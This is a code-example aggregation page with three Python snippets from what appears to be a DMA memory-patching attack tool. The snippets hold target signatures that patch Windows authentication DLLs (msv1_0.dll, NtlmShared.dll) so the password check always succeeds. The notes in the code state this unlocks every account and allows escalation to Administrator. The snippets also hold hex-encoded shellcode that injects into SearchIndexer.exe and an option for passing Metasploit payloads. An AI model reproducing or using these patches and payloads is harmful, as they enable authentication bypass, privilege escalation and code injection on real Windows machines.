Ejemplo n.º 1
0
# Target template
targets = [
    Target(name='find',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x2a0],
                         chunks=[
                             Chunk(chunk=0x9782440e1b5939ff,
                                   chunkoffset=0x00,
                                   patch=0x00,
                                   patchoffset=0x00)
                         ])
           ]),
    Target(name='findall',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x031],
                         chunks=[
Ejemplo n.º 2
0
     note='Ensures that the password-check always returns true. This will '
     'cause all accounts to no longer require a password, and will '
     'also allow you to escalate privileges to Administrator via the '
     '\'runas\' command.',
     signatures=[
         Signature(os='Windows 10',
                   os_versions=['10.0'],
                   os_architectures=['x64'],
                   executable='NtlmShared.dll',
                   version=None,
                   md5=None,
                   tag=False,
                   offsets=[0x14f],
                   chunks=[
                       Chunk(chunk=0xc60f84,
                             chunkoffset=0x00,
                             patch=0xb001,
                             patchoffset=0x07)
                   ])
     ]),
 Target(
     name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
     note='Ensures that the password-check always returns true. This will '
     'cause all accounts to no longer require a password, and will '
     'also allow you to escalate privileges to Administrator via the '
     '\'runas\' command.',
     signatures=[
         Signature(os='Windows 8',
                   os_versions=['8.0'],
                   os_architectures=['x86'],
                   executable='msv1_0.dll',
                   version=None,
Ejemplo n.º 3
0
    b'\x44\x69\x72\x3d\x4f\x75\x74\x7c\x41\x70\x70\x3d\x25\x73' +
    b'\x79\x73\x74\x65\x6d\x44\x72\x69\x76\x65\x25\x5c\x57\x49' +
    b'\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32' +
    b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' +
    b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' +
    b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' +
    b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00'
}

stage1 = Target(name='Allocate page',
                note='Create page, copy signature to it and jump to page',
                signatures=[
                    Signature(offsets=[0x18c],
                              chunks=[
                                  Chunk(chunk=0x8bff558bec813D,
                                        chunkoffset=0,
                                        patch=shellcode['alloc_page'],
                                        patchoffset=0)
                              ],
                              os='Windows 7',
                              os_versions=['SP1'],
                              os_architectures=['x86'],
                              executable='SearchIndexer.exe',
                              version='',
                              md5='',
                              tag=False)
                ])


def add_options(group):
    group.add_option('--msfopts',
                     dest='msfopts',